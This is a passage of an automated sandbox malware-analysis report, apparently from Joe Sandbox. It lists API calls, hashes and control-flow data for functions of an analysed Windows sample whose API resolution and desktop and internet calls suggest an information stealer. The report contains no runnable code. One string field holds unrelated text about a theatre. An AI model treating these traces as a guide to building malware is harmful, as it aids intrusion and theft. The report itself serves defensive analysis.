                          • lstrlen.KERNEL32(00734B98), ref: 00721D9F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00721DBC
                          • lstrcat.KERNEL32(00000000,00734B98), ref: 00721DC8
                          • lstrlen.KERNEL32(00000000), ref: 00721DD7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00721DF9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00721E04
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                          • String ID:
                          • API String ID: 3366406952-0
                          • Opcode ID: 7b2e7e3c3913a0773c0d411ec72716c1e884c39469ac6f0af2f94eaebc019086
                          • Instruction ID: 52bc0067b60418eaa0f29b4ec7d421eb790680c43df318bff8ec3fa33066489e
                          • Opcode Fuzzy Hash: 7b2e7e3c3913a0773c0d411ec72716c1e884c39469ac6f0af2f94eaebc019086
                          • Instruction Fuzzy Hash: 1B71A371A28325EBD721ABB4EC4DB6F36B9BF51701F444124F906A61A2DF78D802DF60
                          Function 00704A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2850 704a60-704afc RtlAllocateHeap 2867 704b7a-704bbe VirtualProtect 2850->2867 2868 704afe-704b03 2850->2868 2869 704b06-704b78 2868->2869 2869->2867
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00704AA2
                          • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00704BB0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-3329630956
                          • Opcode ID: 31e6e4543d4089a82d7db94d37326553c179712eb5f126298ea0aa38672bf1b5
                          • Instruction ID: 48d1d85667ca7c4d15906a619996b59cfb24f9fce981054cb191606d6d79347c
                          • Opcode Fuzzy Hash: 31e6e4543d4089a82d7db94d37326553c179712eb5f126298ea0aa38672bf1b5
                          • Instruction Fuzzy Hash: C93128A8F8822C76E628EBFF4C47F5F7E55DF85760F024096740857182C9A97481CBEA
                          Function 00722A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00722A6F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00722A76
                          • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00722A8A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 30e7764b7ff8397893527d5c605920b006796d801b07b9f8dfd5ee3f8112ca8e
                          • Instruction ID: 8e22b14835f56a1ff9580317ae86dcfe3e1c3abd367a2067e99222d8c94d12ff
                          • Opcode Fuzzy Hash: 30e7764b7ff8397893527d5c605920b006796d801b07b9f8dfd5ee3f8112ca8e
                          • Instruction Fuzzy Hash: BEF054B1A48654ABD710DF98DD49B9EBBBCF749B21F100216F915E3680D7B419048AE1
                          Function 007266E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 633 7266e0-7266e7 634 726afe-726b92 LoadLibraryA * 8 633->634 635 7266ed-726af9 GetProcAddress * 43 633->635 636 726b94-726c03 GetProcAddress * 5 634->636 637 726c08-726c0f 634->637 635->634 636->637 638 726cd2-726cd9 637->638 639 726c15-726ccd GetProcAddress * 8 637->639 640 726cdb-726d4a GetProcAddress * 5 638->640 641 726d4f-726d56 638->641 639->638 640->641 642 726de9-726df0 641->642 643 726d5c-726de4 GetProcAddress * 6 641->643 644 726f10-726f17 642->644 645 726df6-726f0b GetProcAddress * 12 642->645 643->642 646 726f19-726f88 GetProcAddress * 5 644->646 647 726f8d-726f94 644->647 645->644 646->647 648 726fc1-726fc8 647->648 649 726f96-726fbc GetProcAddress * 2 647->649 650 726ff5-726ffc 648->650 651 726fca-726ff0 GetProcAddress * 2 648->651 649->648 652 727002-7270e8 GetProcAddress * 10 650->652 653 7270ed-7270f4 650->653 651->650 652->653 654 727152-727159 653->654 655 7270f6-72714d GetProcAddress * 4 653->655 656 72715b-727169 GetProcAddress 654->656 657 72716e-727175 654->657 655->654 656->657 658 7271d3 657->658 659 727177-7271ce GetProcAddress * 4 657->659 659->658
                          APIs
                          • GetProcAddress.KERNEL32(75900000,010C6460), ref: 007266F5
                          • GetProcAddress.KERNEL32(75900000,010C6500), ref: 0072670D
                          • GetProcAddress.KERNEL32(75900000,010D8F70), ref: 00726726
                          • GetProcAddress.KERNEL32(75900000,010D8F88), ref: 0072673E
                          • GetProcAddress.KERNEL32(75900000,010DD058), ref: 00726756
                          • GetProcAddress.KERNEL32(75900000,010DD070), ref: 0072676F
                          • GetProcAddress.KERNEL32(75900000,010CB130), ref: 00726787
                          • GetProcAddress.KERNEL32(75900000,010DCF20), ref: 0072679F
                          • GetProcAddress.KERNEL32(75900000,010DD088), ref: 007267B8
                          • GetProcAddress.KERNEL32(75900000,010DCF80), ref: 007267D0
                          • GetProcAddress.KERNEL32(75900000,010DCFB0), ref: 007267E8
                          • GetProcAddress.KERNEL32(75900000,010C6480), ref: 00726801
                          • GetProcAddress.KERNEL32(75900000,010C63E0), ref: 00726819
                          • GetProcAddress.KERNEL32(75900000,010C62E0), ref: 00726831
                          • GetProcAddress.KERNEL32(75900000,010C6620), ref: 0072684A
                          • GetProcAddress.KERNEL32(75900000,010DD0A0), ref: 00726862
                          • GetProcAddress.KERNEL32(75900000,010DD010), ref: 0072687A
                          • GetProcAddress.KERNEL32(75900000,010CAF28), ref: 00726893
                          • GetProcAddress.KERNEL32(75900000,010C6400), ref: 007268AB
                          • GetProcAddress.KERNEL32(75900000,010DCF38), ref: 007268C3
                          • GetProcAddress.KERNEL32(75900000,010DCF98), ref: 007268DC
                          • GetProcAddress.KERNEL32(75900000,010DD0B8), ref: 007268F4
                          • GetProcAddress.KERNEL32(75900000,010DCFC8), ref: 0072690C
                          • GetProcAddress.KERNEL32(75900000,010C6520), ref: 00726925
                          • GetProcAddress.KERNEL32(75900000,010DCFE0), ref: 0072693D
                          • GetProcAddress.KERNEL32(75900000,010DD040), ref: 00726955
                          • GetProcAddress.KERNEL32(75900000,010DD0D0), ref: 0072696E
                          • GetProcAddress.KERNEL32(75900000,010DCFF8), ref: 00726986
                          • GetProcAddress.KERNEL32(75900000,010DD028), ref: 0072699E
                          • GetProcAddress.KERNEL32(75900000,010DCF50), ref: 007269B7
                          • GetProcAddress.KERNEL32(75900000,010DCF68), ref: 007269CF
                          • GetProcAddress.KERNEL32(75900000,010DC968), ref: 007269E7
                          • GetProcAddress.KERNEL32(75900000,010DCB78), ref: 00726A00
                          • GetProcAddress.KERNEL32(75900000,010D9B38), ref: 00726A18
                          • GetProcAddress.KERNEL32(75900000,010DCB48), ref: 00726A30
                          • GetProcAddress.KERNEL32(75900000,010DCA10), ref: 00726A49
                          • GetProcAddress.KERNEL32(75900000,010C6540), ref: 00726A61
                          • GetProcAddress.KERNEL32(75900000,010DCB18), ref: 00726A79
                          • GetProcAddress.KERNEL32(75900000,010C6280), ref: 00726A92
                          • GetProcAddress.KERNEL32(75900000,010DCB60), ref: 00726AAA
                          • GetProcAddress.KERNEL32(75900000,010DCAE8), ref: 00726AC2
                          • GetProcAddress.KERNEL32(75900000,010C6560), ref: 00726ADB
                          • GetProcAddress.KERNEL32(75900000,010C6580), ref: 00726AF3
                          • LoadLibraryA.KERNEL32(010DCBC0,0072051F), ref: 00726B05
                          • LoadLibraryA.KERNEL32(010DCB90), ref: 00726B16
                          • LoadLibraryA.KERNEL32(010DC920), ref: 00726B28
                          • LoadLibraryA.KERNEL32(010DCB30), ref: 00726B3A
                          • LoadLibraryA.KERNEL32(010DCBA8), ref: 00726B4B
                          • LoadLibraryA.KERNEL32(010DC998), ref: 00726B5D
                          • LoadLibraryA.KERNEL32(010DCA70), ref: 00726B6F
                          • LoadLibraryA.KERNEL32(010DCBD8), ref: 00726B80
                          • GetProcAddress.KERNEL32(75FD0000,010C68A0), ref: 00726B9C
                          • GetProcAddress.KERNEL32(75FD0000,010DCBF0), ref: 00726BB4
                          • GetProcAddress.KERNEL32(75FD0000,010D8A60), ref: 00726BCD
                          • GetProcAddress.KERNEL32(75FD0000,010DCAB8), ref: 00726BE5
                          • GetProcAddress.KERNEL32(75FD0000,010C66C0), ref: 00726BFD
                          • GetProcAddress.KERNEL32(734B0000,010CB068), ref: 00726C1D
                          • GetProcAddress.KERNEL32(734B0000,010C6840), ref: 00726C35
                          • GetProcAddress.KERNEL32(734B0000,010CAFC8), ref: 00726C4E
                          • GetProcAddress.KERNEL32(734B0000,010DCC08), ref: 00726C66
                          • GetProcAddress.KERNEL32(734B0000,010DC938), ref: 00726C7E
                          • GetProcAddress.KERNEL32(734B0000,010C6740), ref: 00726C97
                          • GetProcAddress.KERNEL32(734B0000,010C69A0), ref: 00726CAF
                          • GetProcAddress.KERNEL32(734B0000,010DCAA0), ref: 00726CC7
                          • GetProcAddress.KERNEL32(763B0000,010C66E0), ref: 00726CE3
                          • GetProcAddress.KERNEL32(763B0000,010C6680), ref: 00726CFB
                          • GetProcAddress.KERNEL32(763B0000,010DC950), ref: 00726D14
                          • GetProcAddress.KERNEL32(763B0000,010DCA58), ref: 00726D2C
                          • GetProcAddress.KERNEL32(763B0000,010C6960), ref: 00726D44
                          • GetProcAddress.KERNEL32(750F0000,010CAFF0), ref: 00726D64
                          • GetProcAddress.KERNEL32(750F0000,010CB158), ref: 00726D7C
                          • GetProcAddress.KERNEL32(750F0000,010DC980), ref: 00726D95
                          • GetProcAddress.KERNEL32(750F0000,010C6980), ref: 00726DAD
                          • GetProcAddress.KERNEL32(750F0000,010C69C0), ref: 00726DC5
                          • GetProcAddress.KERNEL32(750F0000,010CB1D0), ref: 00726DDE
                          • GetProcAddress.KERNEL32(75A50000,010DC9B0), ref: 00726DFE
                          • GetProcAddress.KERNEL32(75A50000,010C6700), ref: 00726E16
                          • GetProcAddress.KERNEL32(75A50000,010D8BB0), ref: 00726E2F
                          • GetProcAddress.KERNEL32(75A50000,010DC9F8), ref: 00726E47
                          • GetProcAddress.KERNEL32(75A50000,010DC9C8), ref: 00726E5F
                          • GetProcAddress.KERNEL32(75A50000,010C66A0), ref: 00726E78
                          • GetProcAddress.KERNEL32(75A50000,010C6780), ref: 00726E90
                          • GetProcAddress.KERNEL32(75A50000,010DCA88), ref: 00726EA8
                          • GetProcAddress.KERNEL32(75A50000,010DC9E0), ref: 00726EC1
                          • GetProcAddress.KERNEL32(75A50000,CreateDesktopA), ref: 00726ED7
                          • GetProcAddress.KERNEL32(75A50000,OpenDesktopA), ref: 00726EEE
                          • GetProcAddress.KERNEL32(75A50000,CloseDesktop), ref: 00726F05
                          • GetProcAddress.KERNEL32(75070000,010C6940), ref: 00726F21
                          • GetProcAddress.KERNEL32(75070000,010DCB00), ref: 00726F39
                          • GetProcAddress.KERNEL32(75070000,010DCAD0), ref: 00726F52
                          • GetProcAddress.KERNEL32(75070000,010DCA28), ref: 00726F6A
                          • GetProcAddress.KERNEL32(75070000,010DCA40), ref: 00726F82
                          • GetProcAddress.KERNEL32(74E50000,010C68C0), ref: 00726F9E
                          • GetProcAddress.KERNEL32(74E50000,010C69E0), ref: 00726FB6
                          • GetProcAddress.KERNEL32(75320000,010C6720), ref: 00726FD2
                          • GetProcAddress.KERNEL32(75320000,010DCE48), ref: 00726FEA
                          • GetProcAddress.KERNEL32(6F060000,010C6800), ref: 0072700A
                          • GetProcAddress.KERNEL32(6F060000,010C67E0), ref: 00727022
                          • GetProcAddress.KERNEL32(6F060000,010C6A00), ref: 0072703B
                          • GetProcAddress.KERNEL32(6F060000,010DCCE0), ref: 00727053
                          • GetProcAddress.KERNEL32(6F060000,010C6760), ref: 0072706B
                          • GetProcAddress.KERNEL32(6F060000,010C67A0), ref: 00727084
                          • GetProcAddress.KERNEL32(6F060000,010C6A20), ref: 0072709C
                          • GetProcAddress.KERNEL32(6F060000,010C67C0), ref: 007270B4
                          • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 007270CB
                          • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 007270E2
                          • GetProcAddress.KERNEL32(74E00000,010DCDE8), ref: 007270FE
                          • GetProcAddress.KERNEL32(74E00000,010D8AA0), ref: 00727116
                          • GetProcAddress.KERNEL32(74E00000,010DCE78), ref: 0072712F
                          • GetProcAddress.KERNEL32(74E00000,010DCE30), ref: 00727147
                          • GetProcAddress.KERNEL32(74DF0000,010C6820), ref: 00727163
                          • GetProcAddress.KERNEL32(6E540000,010DCE60), ref: 0072717F
                          • GetProcAddress.KERNEL32(6E540000,010C6860), ref: 00727197
                          • GetProcAddress.KERNEL32(6E540000,010DCD10), ref: 007271B0
                          • GetProcAddress.KERNEL32(6E540000,010DCCF8), ref: 007271C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                          • API String ID: 2238633743-3468015613
                          • Opcode ID: 6af219ad7a28334988c5670e301abaf7486e482464611de5d6e92dbd5df7ce0f
                          • Instruction ID: db368da0efa68b6e5aa65cd75f0f84ef9d07c136a39de7b24909b7bb71016e82
                          • Opcode Fuzzy Hash: 6af219ad7a28334988c5670e301abaf7486e482464611de5d6e92dbd5df7ce0f
                          • Instruction Fuzzy Hash: 15622EB9A3C7009FD758DF65EE88A2737B9F7896053108919F95683364DBB4A800FF60
                          Function 0071F1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(0072CFEC), ref: 0071F1D5
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071F1F1
                          • lstrlen.KERNEL32(0072CFEC), ref: 0071F1FC
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071F215
                          • lstrlen.KERNEL32(0072CFEC), ref: 0071F220
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071F239
                          • lstrcpy.KERNEL32(00000000,00734FA0), ref: 0071F25E
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071F28C
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071F2C0
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071F2F0
                          • lstrlen.KERNEL32(010C6420), ref: 0071F315
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: 141d0134341a25fdd82bc42abcd5378f865465168dea7b00a7c5dd6b106c408d
                          • Instruction ID: 171b6aa50bd633e05f3bd75b5fa96a8802b4674f310f80d719b8c3daedac18b0
                          • Opcode Fuzzy Hash: 141d0134341a25fdd82bc42abcd5378f865465168dea7b00a7c5dd6b106c408d
                          • Instruction Fuzzy Hash: 07A25171A15205CFCB20DF69D948A9AB7F5AF44314F188179E805EB2E2DB39DC82DF50
                          Function 0071FFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00720013
                          • lstrlen.KERNEL32(0072CFEC), ref: 007200BD
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007200E1
                          • lstrlen.KERNEL32(0072CFEC), ref: 007200EC
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00720110
                          • lstrlen.KERNEL32(0072CFEC), ref: 0072011B
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0072013F
                          • lstrlen.KERNEL32(0072CFEC), ref: 0072015A
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00720189
                          • lstrlen.KERNEL32(0072CFEC), ref: 00720194
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007201C3
                          • lstrlen.KERNEL32(0072CFEC), ref: 007201CE
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00720206
                          • lstrlen.KERNEL32(0072CFEC), ref: 00720250
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00720288
                          • lstrcpy.KERNEL32(00000000,?), ref: 0072059B
                          • lstrlen.KERNEL32(010C6360), ref: 007205AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 007205D7
                          • lstrcat.KERNEL32(00000000,?), ref: 007205E3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0072060E
                          • lstrlen.KERNEL32(010DDF00), ref: 00720625
                          • lstrcpy.KERNEL32(00000000,?), ref: 0072064C
                          • lstrcat.KERNEL32(00000000,?), ref: 00720658
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00720681
                          • lstrlen.KERNEL32(010C6340), ref: 00720698
                          • lstrcpy.KERNEL32(00000000,?), ref: 007206C9
                          • lstrcat.KERNEL32(00000000,?), ref: 007206D5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00720706
                          • lstrcpy.KERNEL32(00000000,010D8AF0), ref: 0072074B
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 00701557
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 00701579
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 0070159B
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 007015FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0072077F
                          • lstrcpy.KERNEL32(00000000,010DDC48), ref: 007207E7
                          • lstrcpy.KERNEL32(00000000,010D88C0), ref: 00720858
                          • lstrcpy.KERNEL32(00000000,fplugins), ref: 007208CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00720928
                          • lstrcpy.KERNEL32(00000000,010D89A0), ref: 007209F8
                            • Part of subcall function 007024E0: lstrcpy.KERNEL32(00000000,?), ref: 00702528
                            • Part of subcall function 007024E0: lstrcpy.KERNEL32(00000000,?), ref: 0070254E
                            • Part of subcall function 007024E0: lstrcpy.KERNEL32(00000000,?), ref: 00702577
                          • lstrcpy.KERNEL32(00000000,010D8940), ref: 00720ACE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00720B81
                          • lstrcpy.KERNEL32(00000000,010D8940), ref: 00720D58
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
